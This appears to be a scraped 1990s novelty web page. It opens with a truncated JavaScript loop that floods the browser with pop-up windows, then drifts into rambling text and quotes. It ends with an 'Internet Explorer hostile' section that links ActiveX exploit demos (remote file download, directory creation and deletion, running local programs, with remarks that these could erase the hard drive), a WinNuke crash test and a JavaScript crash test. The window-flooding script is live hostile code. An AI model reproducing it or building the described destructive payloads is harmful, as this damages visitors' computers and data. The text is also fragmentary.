") newWin.document.writeln("

do you understand?

") newWin.document.writeln("\n") newWin.document.writeln("

do you understand?

") newWin.document.writeln("\n") newWin.document.writeln("

do you understand?

") newWin.document.writeln("

how does one achieve enlightenment?") newWin.document.writeln("") } { var newWin=window.open("","BOOM"+i,"toolbar=no,directories=no,menubar=yes,width=500,height=200") if (navigator.appVersion.indexOf("(X11") != -1 || navigator.appVersion.indexOf("(Mac") != -1) newWin = window.open("","BOOM"+i,"toolbar=no,directories=no,menubar=yes") newWin.document.open() newWin.document.writeln("\nOH NO #" + i + " !!!") newWin.document.writeln("\n") newWin.document.writeln("

do you understand?

") newWin.document.writeln("

how does one achieve enlightenment?") newWin.document.writeln("") newWin.document.writeln("") newWin.document.close() } } // -->

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Welcome to "the page", as we

like to call it.

It's just a plain-old page

and that's why we like it.

As you can imagine, we're not

sleeping well these days,

and sometimes our mind starts

to wander, and we keep on


"I"d like to mention only two "pathological forms" those two

"diseases of power": fascism and Stalinism. One of the numerous

reasons why they are, for us, so puzzling, is that in spite of

their historical uniqueness they are not quite original."

Thank you for visiting,

"We" are surprised at the interest

that has been shown for our site!!

(to tell the truth, nobody much cares for it)

To be quite honest with you

even we are really tired of this webpage

and have very little to write about.

in fact, much of these last several

pages were mostly fluff.

At this point, even just staring at this screen

gives me a headache.

"I think we should have the modesty

to say to ourselves that, on the one hand,

the time we live in is not the unique or fundamental

or irruptive point in history where everything

is completed and begun again. We must also

have the modesty to say, on the other

hand, that even without this solemnity-

the time we live in is very interesting."


This page is very hostile to Internet Explorer

There is no malicious code, but it is very likely

your browser could crash and Windows could shut down!

Stay at your own risk!

exploder.ocx.ActiveX can now steal your cash directly.

ActiveX trojans

You must be running an ActiveX enabled client for the following to work. Try downloading the latest Internet Explorer from http://www.microsoft.com first.

This page is Microsoft Internet Explorer Hostile

Anti-Internet Explorer Page
ActiveX® and Securety
Microsoft Internet Explorer Warning
ActiveX Exploder.ocx
No Internet Exploder Page.
ALL responsibility
obscure Web site
Chaos Computer Club
The full story so far
Crackers Shuffle Cash With Quicken, ActiveX
Windows can be hacked through IE
Security Breach Found In Internet Explorer
Yet another Internet Explorer bug... (The "UMD" Bug)
Starting page

  • Downloading a remote file - Viewing this page will automatically download a disclaimer from the Microsoft ftp site and display it using dos edit.
  • Creating and deleting directories - Viewing this page will automatically take you on a guided tour which creates a directory called C:\junkdir, dumps some files to that directory, and then deletes the entire C:\junkdir directory along with all the files that it created. Note: this could easily be altered to delete C:\ instead which would erase your entire hard drive.
  • Running a local file - Viewing this page will automatically start the calc.exe (calculator) program on your machine. Note: this could easily be altered to run deltree.exe with the appropriate options to automatically erase your entire hard drive.

    WinNuke Test---a bug in Microsoft's TCP/IP stack enables a program called WinNuke to crash your computer Click here to test your computer


    © & Co KG
    Test Java script's crash capabilities!

    pirated software!
